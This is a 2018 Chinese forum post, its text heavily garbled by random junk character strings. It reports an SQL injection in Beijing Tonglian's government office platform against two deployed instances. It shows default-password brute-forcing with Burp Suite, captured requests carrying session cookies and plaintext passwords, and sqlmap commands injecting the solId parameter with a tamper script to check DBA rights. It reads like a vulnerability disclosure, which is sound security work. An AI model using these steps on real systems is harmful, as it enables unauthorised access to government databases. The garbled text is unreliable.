|
4 M8 V) @. k! Q7 X4 ?& O
1 G; p2 b. G4 q: f' B
! ?5 a: X3 X7 t% H6 I" K
* C# r" I w* s6 |( e$ @$ Q1 g
平台简介:7 b* k' }# G* n/ h3 a
) z: O! s( ]0 G3 G7 b4 j4 n( f5 A; C8 M4 B9 r+ G
: a9 H0 D3 J; c# s! ]. V
( m0 @: T; V" Y6 }$ {* ^4 ^
* V2 u: w5 a. z$ ]0 B 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! S) A( C+ {6 K c6 I/ B4 Y同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
7 K/ m- f- m6 H4 Z) c8 _
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
! ]' Q* F& C: d8 m
9 k% J$ y- A$ B: v( B$ M2 z
7 G, h& x; _- f W* O9 D 1 k* s6 \0 ]6 n, ^$ {
3 t4 Y. y2 }' p/ ?3 Y
% s( z4 A1 h8 _7 ~/ w2 [+ A1 I
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:% o4 }- y# J# m: @4 x! j- O, ^
. o: b/ j1 X! F8 h {2 B, U8 T
3 o5 ^; t/ G9 k, R ; a) U8 ]2 g! L0 ^. o/ ?3 E) [' Q
0 L2 b6 y9 N6 i* }7 X
; i* W1 ?1 }! Y% v2 @ http://1.1.1.1:7197/cap-aco/#(案例2-)- H! ^7 [2 A: ?6 ~/ |$ H O) L, h
% T6 c6 V! i, o: \1 w# K
) k+ A3 H. }2 m http://www.XXOO.com (案例1-官网网站)5 |& e( a7 F0 w* Y( _( G
" {2 D- C" ?8 {
8 M. e7 c6 m# e: q : z* b. K; _( _6 {& b
0 P7 ]; F; W; t* v2 [/ Y
) ]/ m7 \- D) f2 ` 漏洞详情:
. R7 [. J3 ]+ p . y' D3 h( J7 o% s
' T/ S: f- y4 E7 i
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
, d' W# ? s" g9 n, }# p9 R 3 T4 T0 M* w8 c$ e
1 J. z2 j8 o5 }- B. x8 W
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:( a3 j `& W1 g* O! v1 l/ ^( T
8 ~ Q; S* T; ?$ F
7 S0 `8 C7 j; L8 p" m* C6 Z
" s, d J: y5 l- ]% \
% E( Y w- j1 A3 Z1 q, A) P
w/ ^; H! a9 y! t' Y
 + M0 X7 @& j W& V& |
, }; b+ Z4 D1 w$ L- W4 H0 V/ \5 o$ n% Q3 B
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:' E. \! C& r, j1 \& P
/ ] g# h! s" N+ K8 c6 X) E$ ]! l4 W: I* }0 c1 A6 c: r
1、案例1-官方网站
5 t) K S$ k+ I6 k# T) n& J- p
( D5 N, h$ f/ l. i* _' ~! v, B; v9 M6 z
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
# o) u* A- N- L: r2 d: D
8 N+ u) Y! M( b% O
8 N& H: n6 h8 i Host: www.XXOO.com
9 Q ?: G% R9 x& D ) f( U1 t( Y' @8 s8 b
- \0 f% X" g3 R8 ^
Proxy-Connection: Keep-Alive
( A W8 b2 I# H8 r# N 1 V) L4 L, B! P' Y
. @, N. E) U) _
Accept: application/json, text/javascript, */*; q=0.01& l, w1 O/ H# @. v4 I
O% P5 k6 E5 M" q
# E9 [5 a+ ~, C+ v; Q0 h( E
Accept-Language: zh-CN' s1 R) I, {& v4 Z3 }# c
+ i7 Q, D# L F* O7 n$ b1 V
3 c9 S4 O9 R6 Z |' ~1 m Content-Type: application/json3 c7 L" b. h3 _4 U% ~
6 ?) ?$ D% u( ^9 W& x, h
" }3 W$ s6 x9 o: R. u4 x6 U% A User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko& {* ?3 M, W* P# S+ |
0 H. ^ |1 U( E' E9 N- b
4 |' e7 P% p5 j2 b$ g7 A
X-Requested-With: XMLHttpRequest
. ?$ h! A7 O, A) y8 |" T8 g( ] 8 b7 s2 S) D! K. l$ d, k. m* P
# o. X: C0 z9 t7 p/ V Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
" {# u/ @& g, B! T. x
# K6 q0 J4 U! W0 E! ]% G: \% h
& [: e9 {1 p7 i0 x7 x0 j Accept-Encoding: gzip, deflate, sdch
5 s5 s1 _# z- f @: |2 c/ ]* q* U9 d 7 W1 j I; I- X
+ w: q8 k6 r7 B Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e9 B8 L. m: J6 h. F; E
* H8 f* g$ j; e3 l- `0 J8 j' S4 D+ I3 x$ `0 M1 A6 q
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:2 C& x& v8 T* [2 v% i
0 Y2 _4 }; H/ @! K1 A
' t4 ~. I$ L0 R% [- ~' d 
/ J) n) B& E" P7 j & l8 J i0 E+ k4 \6 Y+ u
$ M7 [" W9 k3 Q; \3 P* q6 Z; e- g  2 o6 M5 a% a3 u5 M. a, R
/ m w3 P, Y4 Z$ J! N5 X9 ^' ^, }4 `$ T- X; {$ s0 Y5 z
* L% T6 H9 j. \8 n+ r8 Z
+ l9 ]' n4 |: y2 {
* m1 k6 o+ i+ h; O' f1 s
* }& V p8 f6 Y. Q6 ^- M l2 y N( q6 S. ^9 `- x6 V, M. o
0 ]* m$ O6 V* ?$ s
4 N, f2 ?, c$ Z7 x0 f: A' s9 n$ |
( b9 D. N3 r) `5 S$ [; k# v: i! ? ~
5 R! Q2 P! x. ?% e/ k. } 2、案例2-某天河云平台
! l0 @( g* ?4 w4 w. T2 s6 U# T, r, y 3 t/ x, L# y; d8 B& i( C3 ]
: M" Q& a, G& f b/ B6 @
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
6 V4 E3 ~4 v0 ^3 y/ d* U$ d+ ~ & I8 J ]* K. {0 p" K: V
0 K0 L5 V; d' |: a Host: 1.1.1.:7197) ?8 L( C( b! d [
% @8 T& S4 l4 O, P+ J
" ^4 S- r7 U& D Accept: application/json, text/javascript, */*; q=0.01
, I" ^9 b9 S- I% K8 E2 ^ 3 F$ F( b, H. u/ N# r/ h
1 N# y6 m7 s# _% \% g
X-Requested-With: XMLHttpRequest
6 A# p# ?+ k1 a0 V X
# l' u. e" O/ V* i9 i5 [* W, n
3 z: s5 ?5 ]: O v User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
1 a6 R: b! P; `7 Y0 M
- Q: g: Q3 x+ o% p# W) v
: q( X. s* @' X: ]+ L Content-Type: application/json( a% M7 K) E% [5 g0 X
4 u, C' }' K9 {
; [8 `8 K$ u, M Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
: t* M! `4 u! b8 `; Y 0 C* a' Y# {$ j0 \; U" O
& L0 w1 w7 q" A# `% Y7 c8 v3 T% q
Accept-Language: zh-CN,zh;q=0.8
3 `* Q" i" ^3 R; _5 i3 f 0 [8 O- G. F% z; r
1 Z. Q6 }/ u9 |6 u
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1$ o6 i# ^9 d3 M. C5 U0 l! t) Q
5 q# L( _( J% w6 N
7 l1 S3 x6 M( u0 @% F Connection: close
4 L$ u* T, W$ |* ?" `
4 q* Z. Y$ m$ u t2 L; Z3 `3 I' K: f2 j
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
* B7 Q; y# D& h6 R- x
! D5 }8 k( P) M, f( l5 d9 e% S0 Q: w& F0 w: B; H# U
- i! Q& ]% m4 e7 b 3 J. D" H( O& c$ B8 n3 J
) ~$ ]+ z" w) i7 p, N
, k2 ^ ~; @' Y9 Q6 d# M
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对